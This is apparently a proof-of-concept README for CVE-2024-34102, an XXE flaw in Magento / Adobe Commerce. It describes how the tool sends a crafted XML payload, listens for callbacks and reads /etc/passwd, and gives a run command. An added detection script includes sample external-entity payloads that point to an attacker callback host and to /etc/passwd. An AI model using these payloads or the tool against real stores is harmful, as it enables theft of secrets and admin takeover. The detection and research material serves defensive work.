CVE-2024-34102 PoC — XXE can expose crypt key and other secrets granting full admin access

Associated Vulnerability
Title: XXE can expose crypt key and other secrets granting full admin access (CVE-2024-34102)
Description: Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction.
Readme
# CVE-2024-34102
POC for CVE-2024-34102. A pre-authentication XML entity injection issue in Magento / Adobe Commerce. 

![Banner](screens/screen.jpg)


## Overview

This POC will attempt to read files from target hosts that are vulnerable to the recent Magento / Adobe Commerce CVE-2024-34102. This POC is based on this [security advisory](https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md) and this research by [Assetnote](https://www.assetnote.io/resources/research/why-nested-deserialization-is-harmful-magento-xxe-cve-2024-34102).

## How to Use

To run this POC, you need a machine with a published and accessible IP address.

### What This POC Does

1. Creates a local file `poc.xml` containing the main payloads.
2. Sends the payload to the target via a POST request.
3. Sets up a listener on your machine for incoming GET requests from the target.
4. Attempts to read files from the target (default: `/etc/passwd`).
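
A defender-side view of steps 2 and 3, as an added example that is not part of the original README or the POC script: it scans captured request bodies for external entity declarations (including XML carried inside JSON strings) and matches any declared callback host against outbound connections from the web server. The JSON shape, the egress log format and the addresses are constructed assumptions.

```python
import json
import re
from urllib.parse import urlsplit

# External general/parameter entity declaration: <!ENTITY [%] name SYSTEM "uri">
ENTITY_RE = re.compile(
    r"""<!ENTITY\s+(?:%\s+)?[\w.:-]+\s+(?:SYSTEM|PUBLIC\s+["'][^"']*["'])\s*["']([^"']+)["']""",
    re.IGNORECASE,
)

def _strings(node):
    """Yield every string nested in decoded JSON (XML may ride inside a value)."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        for key, value in node.items():
            yield key
            yield from _strings(value)
    elif isinstance(node, list):
        for value in node:
            yield from _strings(value)

def external_entities(body):
    """Return [(uri, host)] for each external entity declared in a request body."""
    try:
        texts = list(_strings(json.loads(body)))  # unescapes \" around the URI
    except ValueError:
        texts = []
    texts.append(body)  # raw XML bodies, or JSON that failed to parse
    found = []
    for text in texts:
        for uri in ENTITY_RE.findall(text):
            hit = (uri, urlsplit(uri).hostname)  # host is None for file:// URIs
            if hit not in found:
                found.append(hit)
    return found

def correlate(body, egress_lines):
    """Egress records whose destination is a callback host named in the body."""
    hosts = {host for _, host in external_entities(body) if host}
    return [line for line in egress_lines if hosts & set(line.split())]

# Constructed samples: hypothetical JSON shape, log format and TEST-NET addresses.
SAMPLE_JSON_BODY = json.dumps({"outer": {"inner": '<?xml version="1.0"?><!DOCTYPE r '
    '[<!ENTITY % ext SYSTEM "http://192.0.2.10:8000/dtd.xml"> %ext;]><r/>'}})
SAMPLE_XML_BODY = '<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]><r>&x;</r>'
SAMPLE_EGRESS = [
    "2024-06-27T10:00:00Z web01 198.51.100.7 443 CONNECT",
    "2024-06-27T10:00:01Z web01 192.0.2.10 8000 GET /dtd.xml",
]
```

An outbound GET from a storefront host to an address that first appeared inside an inbound request body is a strong signal to investigate, since the application itself rarely initiates such connections.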

### Minimum Requirements

- Python 3.6 or higher
- `requests` library
  
To use this POC against a single target:
```sh
# -r is optional; the default file is /etc/passwd
python cve-2024-34102.py -u target -ip your-machine-ip -p any-open-port-in-your-machine -r file-to-read-from-target
```

## Contact

For any suggestions or thoughts, please get in touch with [me](https://x.com/MohamedNab1l).


## Disclaimer

This tool is provided for educational purposes only. I do not encourage, condone, or support unauthorized access to any system or network. Use this tool responsibly and only on systems you have explicit permission to test. Any actions and consequences resulting from misuse of this tool are your own responsibility.

## References
- https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md
- https://www.assetnote.io/resources/research/why-nested-deserialization-is-harmful-magento-xxe-cve-2024-34102
File Snapshot

```
[4.0K] /data/pocs/ad031453052324458249232e3558b20f444b48e5
├── [10.0K] cve-2024-34102.py
├── [1.8K] README.md
└── [4.0K] screens
    └── [239K] screen.jpg

1 directory, 3 files
```